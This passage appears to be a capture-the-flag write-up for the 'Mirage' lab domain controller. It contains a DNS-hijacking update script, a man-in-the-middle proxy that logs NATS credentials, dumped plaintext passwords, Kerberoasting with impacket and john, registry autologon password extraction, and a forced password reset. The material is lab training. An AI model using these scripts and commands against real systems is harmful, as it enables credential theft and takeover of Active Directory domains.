| INFO {"server_id":"NABPKV7U2D5HPEHFAP2T2TL5NZNY2TSOSHXRQLLO6GA7FVHR6NKSYTYV","server_name":"NABPKV7U2D5HPEHFAP2T2TL5NZNY2TSOSHXRQLLO6GA7FVHR6NKSYTYV","version":"2.11.3","proto":1,"git_commit":"a82cfda","go":"go1.24.2","host":"0.0.0.0","port":4222,"headers":true,"auth_required":true,"max_payload":1048576,"jetstream":true,"client_id":25,"client_ip":"10.10.14.82","xkey":"XDQ7PLA2MPHDQWMWT4JYEHPIZ3ELXPMGKM37PB7KG5Y54IHX5XVU724R"}
|_ -ERR 'Authentication Timeout'
5985/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf syn-ack ttl 127 .NET Message Framing
47001/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49665/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49666/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49667/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49668/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49699/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49706/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
49707/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49722/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
52803/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
56059/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
56085/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
56088/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port4222-TCP:V=7.95%I=7%D=7/20%Time=687D15B1%P=x86_64-pc-linux-gnu%r(NU
SF:LL,1CF,"INFO\x20{\"server_id\":\"NABPKV7U2D5HPEHFAP2T2TL5NZNY2TSOSHXRQL
SF:LO6GA7FVHR6NKSYTYV\",\"server_name\":\"NABPKV7U2D5HPEHFAP2T2TL5NZNY2TSO
SF:SHXRQLLO6GA7FVHR6NKSYTYV\",\"version\":\"2\.11\.3\",\"proto\":1,\"git_c
SF:ommit\":\"a82cfda\",\"go\":\"go1\.24\.2\",\"host\":\"0\.0\.0\.0\",\"por
SF:t\":4222,\"headers\":true,\"auth_required\":true,\"max_payload\":104857
SF:6,\"jetstream\":true,\"client_id\":25,\"client_ip\":\"10\.10\.14\.82\",
SF:\"xkey\":\"XDQ7PLA2MPHDQWMWT4JYEHPIZ3ELXPMGKM37PB7KG5Y54IHX5XVU724R\"}\
SF:x20\r\n-ERR\x20'Authentication\x20Timeout'\r\n")%r(GenericLines,1D0,"IN
SF:FO\x20{\"server_id\":\"NABPKV7U2D5HPEHFAP2T2TL5NZNY2TSOSHXRQLLO6GA7FVHR
SF:6NKSYTYV\",\"server_name\":\"NABPKV7U2D5HPEHFAP2T2TL5NZNY2TSOSHXRQLLO6G
SF:A7FVHR6NKSYTYV\",\"version\":\"2\.11\.3\",\"proto\":1,\"git_commit\":\"
SF:a82cfda\",\"go\":\"go1\.24\.2\",\"host\":\"0\.0\.0\.0\",\"port\":4222,\
SF:"headers\":true,\"auth_required\":true,\"max_payload\":1048576,\"jetstr
SF:eam\":true,\"client_id\":26,\"client_ip\":\"10\.10\.14\.82\",\"xkey\":\
SF:"XDQ7PLA2MPHDQWMWT4JYEHPIZ3ELXPMGKM37PB7KG5Y54IHX5XVU724R\"}\x20\r\n-ER
SF:R\x20'Authorization\x20Violation'\r\n")%r(GetRequest,1D0,"INFO\x20{\"se
SF:rver_id\":\"NABPKV7U2D5HPEHFAP2T2TL5NZNY2TSOSHXRQLLO6GA7FVHR6NKSYTYV\",
SF:\"server_name\":\"NABPKV7U2D5HPEHFAP2T2TL5NZNY2TSOSHXRQLLO6GA7FVHR6NKSY
SF:TYV\",\"version\":\"2\.11\.3\",\"proto\":1,\"git_commit\":\"a82cfda\",\
SF:"go\":\"go1\.24\.2\",\"host\":\"0\.0\.0\.0\",\"port\":4222,\"headers\":
SF:true,\"auth_required\":true,\"max_payload\":1048576,\"jetstream\":true,
SF:\"client_id\":27,\"client_ip\":\"10\.10\.14\.82\",\"xkey\":\"XDQ7PLA2MP
SF:HDQWMWT4JYEHPIZ3ELXPMGKM37PB7KG5Y54IHX5XVU724R\"}\x20\r\n-ERR\x20'Autho
SF:rization\x20Violation'\r\n")%r(HTTPOptions,1D0,"INFO\x20{\"server_id\":
SF:\"NABPKV7U2D5HPEHFAP2T2TL5NZNY2TSOSHXRQLLO6GA7FVHR6NKSYTYV\",\"server_n
SF:ame\":\"NABPKV7U2D5HPEHFAP2T2TL5NZNY2TSOSHXRQLLO6GA7FVHR6NKSYTYV\",\"ve
SF:rsion\":\"2\.11\.3\",\"proto\":1,\"git_commit\":\"a82cfda\",\"go\":\"go
SF:1\.24\.2\",\"host\":\"0\.0\.0\.0\",\"port\":4222,\"headers\":true,\"aut
SF:h_required\":true,\"max_payload\":1048576,\"jetstream\":true,\"client_i
SF:d\":28,\"client_ip\":\"10\.10\.14\.82\",\"xkey\":\"XDQ7PLA2MPHDQWMWT4JY
SF:EHPIZ3ELXPMGKM37PB7KG5Y54IHX5XVU724R\"}\x20\r\n-ERR\x20'Authorization\x
SF:20Violation'\r\n");
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 30370/tcp): CLEAN (Couldn't connect)
| Check 2 (port 25720/tcp): CLEAN (Couldn't connect)
| Check 3 (port 20637/udp): CLEAN (Failed to receive data)
| Check 4 (port 41474/udp): CLEAN (Timeout)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
| smb2-time:
| date: 2025-07-20T17:22:25
|_ start_date: N/A
|_clock-skew: 1h07m39s
NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 12:16
Completed NSE at 12:16, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 12:16
Completed NSE at 12:16, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 12:16
Completed NSE at 12:16, 0.01s elapsed
Read data files from: /usr/share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 150.24 seconds
Raw packets sent: 34 (1.472KB) | Rcvd: 31 (1.348KB)
The scan confirms a Windows Domain Controller (dc01.mirage.htb) with the standard AD ports (53/DNS, 88/Kerberos, 389/LDAP, 5985/WinRM) plus three unusual services that shape the attack path: NFS (2049) exposes RPC mount endpoints — potentially allowing anonymous share access; DNS (53) accepts dynamic updates, opening the door to DNS hijacking; and NATS (4222) is a high-performance messaging system that requires authentication but leaks enough metadata to be intercepted.
First, we update /etc/hosts:
1
echo "10.129.119.87 dc01.mirage.htb mirage.htb" | sudo tee -a /etc/hosts
From here, we have something interesting — port 2049 (NFS) is running. After running the below command, we found a /MirageReports directory that is accessible by everyone.
1
showmount -e 10.129.119.87
Now mount the remote share to a local directory on our machine.
NFS Mount Check (Port 2049):
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
┌──(root㉿kali)-[/mnt/mirage]
└─# mkdir /mnt/mirage
┌──(root㉿kali)-[/mnt/mirage]
└─# showmount -e 10.129.119.87
Export list for 10.129.119.87:
/MirageReports (everyone)
┌──(root㉿kali)-[/mnt/mirage]
└─# mount -t nfs 10.129.119.87:/MirageReports /mnt/mirage
┌──(root㉿kali)-[/mnt/mirage]
└─# ls
Incident_Report_Missing_DNS_Record_nats-svc.pdf Mirage_Authentication_Hardening_Report.pdf
Moving these files for ease of access.
1
2
3
4
5
6
7
┌──(root㉿kali)-[/mnt/mirage]
└─# cp /mnt/mirage/Incident_Report_Missing_DNS_Record_nats-svc.pdf /home/kali/HTB-machine/mirage
┌──(root㉿kali)-[/mnt/mirage]
└─# cp /mnt/mirage/Mirage_Authentication_Hardening_Report.pdf /home/kali/HTB-machine/mirage
Here, after reading the PDF Incident_Report_Missing_DNS_Record_nats-svc.pdf, we found some interesting information.
The PDF report content summary
- Issue: The internal DNS record for
nats-svc.mirage.htbis missing. - Cause: DNS scavenging removed the dynamic record because the
nats-svcmachine was offline for more than 14 days. - Effect: Development teams couldn’t resolve the hostname to an IP, breaking service communication with the NATS messaging system.
Recommendations:
- Convert
nats-svcto a static DNS record to prevent scavenging. - Increase scavenging intervals to 21–30 days.
- Optionally disable scavenging on the zone (not recommended).
- Convert
- Security note: Missing DNS records can cause apps to attempt connections that might be spoofed by attackers.
NATS (NATS Messaging System) is a lightweight, high-performance publish-subscribe and request-reply messaging system often used for cloud-native microservices communication. It runs on port 4222 and can optionally require authentication via username/password. Connecting to it without credentials returns an Authentication Timeout.
1
2
3
4
5
┌──(kali㉿kali)-[~/HTB-machine/mirage]
└─$ nc 10.129.119.87 4222
INFO {"server_id":"NABPKV7U2D5HPEHFAP2T2TL5NZNY2TSOSHXRQLLO6GA7FVHR6NKSYTYV","server_name":"NABPKV7U2D5HPEHFAP2T2TL5NZNY2TSOSHXRQLLO6GA7FVHR6NKSYTYV","version":"2.11.3","proto":1,"git_commit":"a82cfda","go":"go1.24.2","host":"0.0.0.0","port":4222,"headers":true,"auth_required":true,"max_payload":1048576,"jetstream":true,"client_id":115,"client_ip":"10.10.14.82","xkey":"XDQ7PLA2MPHDQWMWT4JYEHPIZ3ELXPMGKM37PB7KG5Y54IHX5XVU724R"}
-ERR 'Authentication Timeout'
We can also see, using nat cli, that there is an authorization issue.
Connect and get server info
1
nats server info -s nats://10.129.119.87:4222
Subscribe to a subject (listen for messages)
1
nats sub updates -s nats://10.129.119.87:4222
Publish a message to a subject
1
nats pub updates "hello world" -s nats://10.129.119.87:4222
1
2
3
4
5
6
7
8
9
10
┌──(kali㉿kali)-[~/HTB-machine/mirage]
└─$ nats server info -s nats://10.129.119.87:4222
nats: error: nats: Authorization Violation
┌──(kali㉿kali)-[~/HTB-machine/mirage]
└─$ nats pub updates "hello world" -s nats://10.129.119.87:4222
nats: error: nats: Authorization Violation
DNS Hijacking + Proxy Credential Interception
Approach
- The DNS record for the critical service
nats-svcwas missing due to scavenging. - Here we sent an unsigned DNS update to add a malicious A record for
nats-svcpointing to their own proxy server IP (10.10.14.82). - Now, when clients tried to connect to
nats-svc.mirage.htb, they were redirected to the proxy instead of the real server. - The proxy forwarded traffic to the real NATS server but intercepted and logged all the data, including credentials.
nats_proxy_interceptor.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
import socket
import threading
# Local proxy server binds here
LISTEN_HOST = '0.0.0.0'
LISTEN_PORT = 4222
# Real NATS server
REAL_HOST = '10.129.29.94'
REAL_PORT = 4222
def handle_client(client_sock):
# Connect to real NATS server
remote_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
remote_sock.connect((REAL_HOST, REAL_PORT))
def forward(src, dst):
while True:
try:
data = src.recv(4096)
if not data:
break
print(f"[DATA] {data.decode(errors='ignore')}")
dst.sendall(data)
except Exception as e:
break
src.close()
dst.close()
threading.Thread(target=forward, args=(client_sock, remote_sock)).start()
threading.Thread(target=forward, args=(remote_sock, client_sock)).start()
def start_proxy():
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server.bind((LISTEN_HOST, LISTEN_PORT))
server.listen(5)
print(f"[+] Proxy listening on {LISTEN_HOST}:{LISTEN_PORT}")
while True:
client_sock, addr = server.accept()
print(f"[+] Connection from {addr}")
threading.Thread(target=handle_client, args=(client_sock,)).start()
if __name__ == "__main__":
start_proxy()
dns_hijack_update.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
import dns.update
import dns.query
import dns.tsigkeyring
import dns.resolver
# Target DNS server and domain
dns_server = '10.129.29.94'
domain = 'mirage.htb.'
record = 'nats-svc'
ip = '10.10.14.82'
# Build the update request
update = dns.update.Update(domain) # No TSIG, completely unsigned
update.add(record, 300, 'A', ip)
# Send it
response = dns.query.tcp(update, dns_server)
print("Response:")
print(response)
What the proxy script (python socket proxy) does:
- The proxy script acts as a man-in-the-middle (MITM) proxy for the NATS service running on port 4222.
- It listens on all interfaces at port
4222(0.0.0.0:4222), accepts incoming client connections, and forwards data bidirectionally between the client and the real NATS server (10.129.29.94:4222). While forwarding the data, it logs all intercepted traffic, which may include sensitive information such as authentication credentials:
1
print(f"[DATA] {data.decode(errors='ignore')}")
What the DNS update script does:
- This script performs a dynamic DNS update, adding an A record for
nats-svc.mirage.htband pointing it to an IP address controlled by the attacker (e.g.,10.10.14.82). - The update is sent directly to the DNS server (
10.129.29.94) using thedns.updatemodule. Because the DNS server accepts unauthenticated (unsigned) DNS updates, it allows arbitrary modification or addition of records — making it vulnerable to DNS hijacking.
Proxy script: Transparent TCP forwarder that captures traffic on the fly to steal credentials.
- DNS update script: Adds or modifies DNS records dynamically without authentication to redirect traffic.
After running the proxy script and then executing the second DNS script, we obtained leaked credentials.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
┌──(kali㉿kali)-[~/HTB-machine/mirage]
└─$ python3 nats_auth_bypass_proxy.py
[+] Proxy listening on 0.0.0.0:4222
[+] Connection from ('10.129.29.94', 51605)
[DATA] INFO {"server_id":"NBVZY7DPB7WABDCZE2UWAAGDGSZYRCP6GM3UX472JL3MGGVTWSENIDBQ","server_name":"NBVZY7DPB7WABDCZE2UWAAGDGSZYRCP6GM3UX472JL3MGGVTWSENIDBQ","version":"2.11.3","proto":1,"git_commit":"a82cfda","go":"go1.24.2","host":"0.0.0.0","port":4222,"headers":true,"auth_required":true,"max_payload":1048576,"jetstream":true,"client_id":91,"client_ip":"10.10.14.82","xkey":"XDK2FTMEEM7VVW7F6GH3RYAX4TIS6AXOBHIYILNC6P4FIIO6AH6QES7B"}
[DATA] CONNECT {"verbose":false,"pedantic":false,"user":"Dev_Account_A","pass":"hx5h7F5554fP@1337!","tls_required":false,"name":"NATS CLI Version 0.2.2","lang":"go","version":"1.41.1","protocol":1,"echo":true,"headers":true,"no_responders":true}
PING
[DATA] PONG
[DATA] PING
[DATA] PONG
[DATA] PING
[DATA] PONG
[DATA] PING
[DATA] PONG
[DATA] PING
[DATA] PONG
PING
[DATA] PONG
PING
[DATA] PONG
```shell
┌──(kali㉿kali)-[~/HTB-machine/mirage]
└─$ python3 dns_hijack_add_record.py
Response:
id 34873
opcode UPDATE
rcode NOERROR
flags QR
;ZONE
mirage.htb. IN SOA
;PREREQ
;UPDATE
nats-svc.mirage.htb. 300 IN A 10.10.14.82
;ADDITIONAL
Credential Dev_Account_A:hx5h7F5554fP@1337!
Now publish a message to verify the credentials.
1
2
3
4
5
6
7
┌──(kali㉿kali)-[~/bloodhound_setup/BloodHound-linux-x64]
└─$ nats pub test "hello" --server nats://'Dev_Account_A:hx5h7F5554fP@1337!'@10.129.119.87:4222
14:48:14 Published 5 bytes to "test"
┌──(kali㉿kali)-[~/bloodho
Listed available streams using nats stream ls, which shows an existing stream auth_logs with 5 messages and 570 bytes of data.
1
2
3
4
5
6
7
8
9
10
11
┌──(kali㉿kali)-[~/bloodhound_setup/BloodHound-linux-x64]
└─$ nats stream ls --server nats://Dev_Account_A:'hx5h7F5554fP@1337!'@10.129.119.87:4222
╭─────────────────────────────────────────────────────────────────────────────────╮
│ Streams │
├───────────┬─────────────┬─────────────────────┬──────────┬───────┬──────────────┤
│ Name │ Description │ Created │ Messages │ Size │ Last Message │
├───────────┼─────────────┼─────────────────────┼──────────┼───────┼──────────────┤
│ auth_logs │ │ 2025-05-05 03:18:19 │ 5 │ 570 B │ 76d11h41m25s │
╰───────────┴─────────────┴─────────────────────┴──────────┴───────┴──────────────╯
It fetches detailed information about the auth_logs stream (like subjects, message count, retention, storage type, etc.)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
┌──(kali㉿kali)-[~/bloodhound_setup/BloodHound-linux-x64]
└─$ nats stream info auth_logs --server nats://Dev_Account_A:'hx5h7F5554fP@1337!'@10.129.119.87:4222
Information for Stream auth_logs created 2025-05-05 03:18:19
Subjects: logs.auth
Replicas: 1
Storage: File
Options:
Retention: Limits
Acknowledgments: true
Discard Policy: New
Duplicate Window: 2m0s
Direct Get: true
Allows Batch Publish: false
Allows Counters: false
Allows Msg Delete: false
Allows Per-Message TTL: false
Allows Purge: false
Allows Rollups: false
Limits:
Maximum Messages: 100
Maximum Per Subject: unlimited
Maximum Bytes: 1.0 MiB
Maximum Age: unlimited
Maximum Message Size: unlimited
Maximum Consumers: unlimited
State:
Host Version: 2.11.3
Required API Level: 0 hosted at level 1
Messages: 5
Bytes: 570 B
First Sequence: 1 @ 2025-05-05 03:18:56
Last Sequence: 5 @ 2025-05-05 03:19:27
Active Consumers: 0
Number of Subjects: 1
Retrieves and displays the actual messages stored in the auth_logs stream on the NATS JetStream server.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
┌──(kali㉿kali)-[~/bloodhound_setup/BloodHound-linux-x64]
└─$ nats stream view auth_logs --server nats://Dev_Account_A:'hx5h7F5554fP@1337!'@10.129.119.87:4222
[1] Subject: logs.auth Received: 2025-05-05 03:18:56
{"user":"david.jjackson","password":"pN8kQmn6b86!1234@","ip":"10.10.10.20"}
[2] Subject: logs.auth Received: 2025-05-05 03:19:24
{"user":"david.jjackson","password":"pN8kQmn6b86!1234@","ip":"10.10.10.20"}
[3] Subject: logs.auth Received: 2025-05-05 03:19:25
{"user":"david.jjackson","password":"pN8kQmn6b86!1234@","ip":"10.10.10.20"}
[4] Subject: logs.auth Received: 2025-05-05 03:19:26
{"user":"david.jjackson","password":"pN8kQmn6b86!1234@","ip":"10.10.10.20"}
[5] Subject: logs.auth Received: 2025-05-05 03:19:27
{"user":"david.jjackson","password":"pN8kQmn6b86!1234@","ip":"10.10.10.20"}
14:51:31 Reached apparent end of data
Credential david.jjackson:pN8kQmn6b86!1234@
Point:
Before moving on, first create a krb5.conf file because NTLM is disabled and we need to authenticate using a Kerberos ticket.
/etc/krb5.conf
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
[libdefaults]
default_realm = MIRAGE.HTB
dns_lookup_realm = false
dns_lookup_kdc = false
dns_canonicalize_hostname = false
ticket_lifetime = 24h
forwardable = true
[realms]
MIRAGE.HTB = {
kdc = dc.mirage.htb
admin_server = dc.mirage.htb
}
MIRAGE.HTB = {
kdc = 10.129.119.87
admin_server = 10.129.119.87
}
[domain_realm]
.mirage.htb = MIRAGE.HTB
mirage.htb = MIRAGE.HTB
Now enumerate users using netexec.
1
netexec ldap dc.mirage.htb -u david.jjackson -p 'pN8kQmn6b86!1234@' -k
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
┌──(kali㉿kali)-[~/bloodhound_setup/BloodHound-linux-x64]
└─$ netexec ldap dc.mirage.htb -u david.jjackson -p 'pN8kQmn6b86!1234@' -k
LDAP dc.mirage.htb 389 dc01.mirage.htb [*] x64 (name:dc01.mirage.htb) (domain:mirage.htb) (signing:True) (SMBv1:False)
LDAP dc.mirage.htb 389 dc01.mirage.htb [+] mirage.htb\david.jjackson:pN8kQmn6b86!1234@
┌──(kali㉿kali)-[~/bloodhound_setup/BloodHound-linux-x64]
└─$ netexec ldap dc.mirage.htb -u david.jjackson -p 'pN8kQmn6b86!1234@' -k --users
LDAP dc.mirage.htb 389 dc01.mirage.htb [*] x64 (name:dc01.mirage.htb) (domain:mirage.htb) (signing:True) (SMBv1:False)
LDAP dc.mirage.htb 389 dc01.mirage.htb [+] mirage.htb\david.jjackson:pN8kQmn6b86!1234@
LDAP dc.mirage.htb 389 dc01.mirage.htb [*] Enumerated 10 domain users: mirage.htb
LDAP dc.mirage.htb 389 dc01.mirage.htb -Username- -Last PW Set- -BadPW- -Description-
LDAP dc.mirage.htb 389 dc01.mirage.htb Administrator 2025-06-23 21:18:18 0 Built-in account for administering the computer/domain
LDAP dc.mirage.htb 389 dc01.mirage.htb Guest <never> 0 Built-in account for guest access to the computer/domain
LDAP dc.mirage.htb 389 dc01.mirage.htb krbtgt 2025-05-01 07:42:23 0 Key Distribution Center Service Account
LDAP dc.mirage.htb 389 dc01.mirage.htb Dev_Account_A 2025-05-27 14:05:12 0
LDAP dc.mirage.htb 389 dc01.mirage.htb Dev_Account_B 2025-05-02 08:28:11 1
LDAP dc.mirage.htb 389 dc01.mirage.htb david.jjackson 2025-05-02 08:29:50 0
LDAP dc.mirage.htb 389 dc01.mirage.htb javier.mmarshall 2025-05-25 18:44:43 0 Contoso Contractors
LDAP dc.mirage.htb 389 dc01.mirage.htb mark.bbond 2025-06-23 21:18:18 0
LDAP dc.mirage.htb 389 dc01.mirage.htb nathan.aadam 2025-06-23 21:18:18 0
LDAP dc.mirage.htb 389 dc01.mirage.htb svc_mirage 2025-05-22 20:37:45 0 Old service account migrated by contractors
After collecting data and viewing it in BloodHound, we found one Kerberoastable account.
1
2
3
4
5
6
7
┌──(kali㉿kali)-[~/HTB-machine/mirage]
└─$ sudo ntpdate $IP
2025-07-23 16:34:45.918813 (-0400) -64442.516846 +/- 0.093539 10.129.29.94 s1 no-leap
CLOCK: time stepped by -64442.516846
┌──(kali㉿kali)-[~/HTB-machine/mirage]
└─$ bloodhound-python -u david.jjackson -p 'pN8kQmn6b86!1234@' -c All -d mirage.htb -ns 10.129.29.94 --zip
1
2
3
4
5
6
7
8
MATCH (u:User)
WHERE u.hasspn=true
AND u.enabled = true
AND NOT u.objectid ENDS WITH '-502'
AND NOT COALESCE(u.gmsa, false) = true
AND NOT COALESCE(u.msa, false) = true
RETURN u
LIMIT 100
This query can be found here:queries.specterops.io
Now get a ticket for this user and crack it using John.
1
sudo ntpdate $IP
1
impacket-GetUserSPNs mirage.htb/david.jjackson:'pN8kQmn6b86!1234@' -dc-host dc01.mirage.htb -k -request -o nathan_hash
1
john nathan_hash --wordlist=/usr/share/wordlists/rockyou.txt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
┌──(kali㉿kali)-[~/HTB-machine/mirage]
└─$ sudo ntpdate $IP
2025-07-20 16:18:48.450401 (-0400) +424.106387 +/- 0.092796 10.129.119.87 s1 no-leap
CLOCK: time stepped by 424.106387
┌──(kali㉿kali)-[~/HTB-machine/mirage]
└─$ impacket-GetUserSPNs mirage.htb/david.jjackson:'pN8kQmn6b86!1234@' -dc-host dc01.mirage.htb -k -request -o nathan_hash
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[-] CCache file is not found. Skipping...
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
------------------------ ------------ ------------------------------------------------------------------- -------------------------- -------------------------- ----------
HTTP/exchange.mirage.htb nathan.aadam CN=Exchange_Admins,OU=Groups,OU=Admins,OU=IT_Staff,DC=mirage,DC=htb 2025-06-23 17:18:18.584667 2025-07-04 16:01:43.511763
[-] CCache file is not found. Skipping...
┌──(kali㉿kali)-[~/HTB-machine/mirage]
└─$ john nathan_hash --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
3edc#EDC3 (?)
1g 0:00:00:06 DONE (2025-07-20 16:20) 0.1519g/s 1895Kp/s 1895Kc/s 1895KC/s 3er733..3ddfiebw
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
Now request a Kerberoast TGT for the nathan,aadam user and grab the user flag.
1
impacket-getTGT mirage.htb/nathan.aadam:'3edc#EDC3' -dc-ip $IP
1
export KRB5CCNAME=nathan.aadam.ccache
1
evil-winrm -i dc01.mirage.htb -r MIRAGE.HTB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
┌──(kali㉿kali)-[~/HTB-machine/mirage]
└─$ impacket-getTGT mirage.htb/nathan.aadam:'3edc#EDC3' -dc-ip $IP
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Saving ticket in nathan.aadam.ccache
┌──(kali㉿kali)-[~/HTB-machine/mirage]
└─$ export KRB5CCNAME=nathan.aadam.ccache
┌──(kali㉿kali)-[~/HTB-machine/mirage]
└─$ evil-winrm -i dc01.mirage.htb -r MIRAGE.HTB
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\nathan.aadam\Documents> cd ..\Desktop
*Evil-WinRM* PS C:\Users\nathan.aadam\Desktop> ls
Directory: C:\Users\nathan.aadam\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 7/4/2025 1:01 PM 2312 Microsoft Edge.lnk
-ar--- 7/20/2025 9:56 AM 34 user.txt
*Evil-WinRM* PS C:\Users\nathan.aadam\Desktop> cat user.txt
50f29ae119089615cebf45513280d54e
*Evil-WinRM* PS C:\Users\nathan.aadam\Desktop>
*Evil-WinRM* PS C:\Users\nathan.aadam\Desktop> exit
Info: Exiting with code 0
malloc(): unaligned fastbin chunk detected
zsh: IOT instruction evil-winrm -i dc01.mirage.htb -r MIRAGE.HTB
After running winPEAS.exe, we found a plaintext password stored in the registry for the auto-login user.
1
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
*Evil-WinRM* PS C:\Users\nathan.aadam\Documents> reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
AutoRestartShell REG_DWORD 0x1
Background REG_SZ 0 0 0
.
.
.
.
scremoveoption REG_SZ 0
DisableCAD REG_DWORD 0x1
LastLogOffEndTimePerfCounter REG_QWORD 0x5655f597
ShutdownFlags REG_DWORD 0x8000022b
DisableLockWorkstation REG_DWORD 0x0
AutoAdminLogon REG_SZ 1
AutoLogonSID REG_SZ S-1-5-21-2127163471-3824721834-2568365109-1109
LastUsedUsername REG_SZ mark.bbond
DefaultPassword REG_SZ 1day@atime
.
.
.
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AutoLogonChecked
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\VolatileUserMgrKey
*Evil-WinRM* PS C:\Users\nathan.aadam\Documents>
Credential mark.bbond:1day@atime
This user has an outbound object control that allows a ForcedChangePassword abuse on user javier.mmarshall.
1
2
3
4
5
┌──(kali㉿kali)-[~/HTB-machine/mirage]
└─$ bloodyAD --host dc01.mirage.htb -k -d mirage.htb -u mark.bbond -p '1day@atime' set password javier.mmarshall 'Password123!'
[+] Password changed successfully!
After trying to get a ticket for the user, we see the KDC_ERR_CLIENT_REVOKED error, which means the user account javier.mmarshall in the domain mirage.htb has been revoked or disabled by the Domain Controller.
1
2
3
4
5
6
7
┌──(kali㉿kali)-[~/HTB-machine/mirage]
└─$ impacket-getTGT mirage.htb/javier.mmarshall:'Password123!' -dc-ip $IP
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
┌──(kali㉿kali)-[~/HTB-machine/mirage]
Here the account is disabled
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
*Evil-WinRM* PS C:\Users\nathan.aadam\Documents> Get-ADUser -Identity "JAVIER.MMARSHALL" -Properties Enabled
Get-ADUser -Identity "JAVIER.MMARSHALL" -Properties Enabled
DistinguishedName : CN=javier.mmarshall,OU=Users,OU=Disabled,DC=mirage,DC=htb
Enabled : False
GivenName : javier.mmarshall
Name : javier.mmarshall
ObjectClass : user
ObjectGUID : c52e731b-30c1-439c-a6b9-0c2f804e5f08
SamAccountName : javier.mmarshall
SID : S-1-5-21-2127163471-3824721834-2568365109-1108
Surname :
UserPrincipalName : javier.mmarshall@mirage.htb
DistinguishedName : CN=javier.mmarshall,OU=Users,OU=Disabled,DC=mirage,DC=htb
Enabled : False
GivenName : javier.mmarshall
Name : javier.mmarshall
ObjectClass : user
ObjectGUID : c52e731b-30c1-439c-a6b9-0c2f804e5f08
SamAccountName : javier.mmarshall
SID : S-1-5-21-2127163471-3824721834-2568365109-1108
Surname :
UserPrincipalName : javier.mmarshall@mirage.htb
*Evil-WinRM* PS C:\Users\nathan.aadam\Documents>
Now we run the following commandin winrm session to Enable AD user and copy logon hours
